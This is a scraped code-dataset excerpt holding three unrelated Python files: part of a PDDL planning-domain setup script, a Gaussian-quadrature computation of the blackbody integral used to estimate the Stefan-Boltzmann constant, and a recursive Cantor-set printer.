        for fname in get_file_list(dom, forbidden_list=forbidden_files+['/domain.pddl']):
            if 'dom' in fname.split('/')[-1]:
                print ("Warning: Double domain in %s must be handled." % dom)
    else:
        multi_dom.append(dom)
    # Every domain directory must be an importable package.
    # NOTE(review): the original (flattened) indentation was ambiguous here;
    # touching for every dom is idempotent and safe -- confirm against upstream.
    os.system("touch %s/__init__.py" % dom)

# Bug fix: in Python 3, map() is lazy; wrap in list() so the domain names
# are actually printed instead of a `<map object ...>` repr.
print ("\nSingle doms: %d" % len(single_dom))
print (list(map(get_name, single_dom)))
print ("\nMulti doms: %d" % len(multi_dom))
print (list(map(get_name, multi_dom)))
print ("\nDone doms: %d" % len(done_dom))
print (list(map(get_name, done_dom)))
print ()

# Sanity-check that every domain named in the IPC tables exists on disk.
# NOTE(review): `ipcs` is presumably an iterable of domain-name lists
# defined earlier in the file -- verify.
for ipc in ipcs:
    for dom in ipc:
        if not os.path.isdir('./'+dom):
            print ("Bad dom: %s" % dom)

for dom in single_dom:
    handle_single(dom)
for dom in multi_dom:
    handle_double(dom)
print()  # bug fix: bare `print` statement was a no-op in Python 3
| AI-Planning/api-tools | scripts/formalism-initialization/classical/create-meta.py | create-meta.py | py | 5,643 | python | en | code | 11 | github-code | 90 |
7568317516 | # -*- coding: utf-8 -*-
"""
Assignment 5 problem 3
Computes the total energy per unit area
radiated by a blackbody by computing the integral
I=\int_0^\infty \frac{x^3}{\exp{x}-1} dx multiplied
by a constant. Analytically this integral may in fact be evaluated exactly,
using the Riemann zeta and Gamma functions. Using the value for the integral
we can estimate the Stefan Boltzmann constant, which has the approximate
value \sigma ~ 5.670373(21)e-8 W m^-2 K^-4. We use Gaussian quadrature to
compute the integral.
"""
from math import exp,fabs
from numpy import ones,copy,cos,tan,pi,linspace
def gaussxw(N):
    """Return the nodes and weights of N-point Gauss-Legendre quadrature
    on the reference interval [-1, 1].

    The nodes are the roots of the Legendre polynomial P_N, located by
    Newton's method from a closed-form starting guess; the weights follow
    from the derivative of P_N at each root.
    """
    # Closed-form initial approximation to the roots of P_N.
    seeds = linspace(3, 4*N-1, N)/(4*N+2)
    x = cos(pi*seeds + 1/(8*N*N*tan(seeds)))

    # Polish all roots simultaneously with Newton's method until the
    # largest update drops below machine precision.
    tol = 1e-15
    shift = 1.0
    while shift > tol:
        p_prev = ones(N, float)
        p_cur = copy(x)
        # Three-term recurrence evaluates P_N (and P_{N-1}) at every x.
        for m in range(1, N):
            p_prev, p_cur = p_cur, ((2*m+1)*x*p_cur - m*p_prev)/(m+1)
        dp = (N+1)*(p_prev - x*p_cur)/(1 - x*x)
        step = p_cur/dp
        x -= step
        shift = max(abs(step))

    # Gauss-Legendre weights expressed via P_N'(x).
    w = 2*(N+1)*(N+1)/(N*N*(1-x*x)*dp*dp)
    return x, w
def gaussxwab(N,a,b):
    """Return N Gauss-Legendre nodes and weights rescaled from the
    reference interval [-1, 1] to the interval [a, b]."""
    nodes, weights = gaussxw(N)
    half = 0.5*(b-a)
    mid = 0.5*(b+a)
    return half*nodes + mid, half*weights
def f(z):
    """Integrand of the Planck integral after the substitution x = z/(1-z),
    which maps [0, inf) onto [0, 1); the Jacobian dx/dz is included, so
    f(z) = x^3/(e^x - 1) * dx/dz.
    """
    if z < 1.0e-4:
        # Near z = 0 the closed form is numerically 0/0; use the Taylor
        # expansion of the full expression instead.
        return z**2+7*z**3/2.0+91*z**4/12+13*z**5+13859*z**6/720+2309*z**7/90
    x = z/(1-z)  # undo the substitution
    return z**3.0/((1.0-z)**5.0*(exp(x)-1))
# Evaluate the integral with 30-point Gauss-Legendre quadrature on [0, 1]
# (the substitution in f() already mapped [0, inf) onto [0, 1)).
N = 30
a = 0.0
b = 1.0
x, w = gaussxwab(N, a, b)
s = 0.0
for node, weight in zip(x, w):
    s += weight*f(node)
print("Value of integral is {0:.3f}".format(s))
#########################################################################
# OUTPUT OF PROGRAM (value of integral)
# Value of integral is 6.494  (s = 6.493947736403491 before the {0:.3f} formatting)
#
| cklanger/Assignment_5 | Langer_problem3.py | Langer_problem3.py | py | 1,713 | python | en | code | 0 | github-code | 90 |
20767418531 | import sys
input = sys.stdin.readline
def cantor(length):
    """Return one text line of the Cantor set drawn at the given width.

    `length` is expected to be a power of three: width 1 is a single dash,
    and each larger level is two copies of the previous level separated by
    a gap of equal width.
    """
    if length == 1:
        return '-'
    third = length // 3
    segment = cantor(third)
    return segment + ' ' * third + segment
if __name__ == '__main__':
    # `input` was rebound to sys.stdin.readline at the top of the file; at
    # end of input it returns '' and int('') raises ValueError, ending the
    # loop.
    while True:
        try:
            N = int(input())
            print(cantor(3**N))
        except (ValueError, EOFError):
            # Bug fix: was a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit and hid any real error raised
            # by cantor().
            break
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.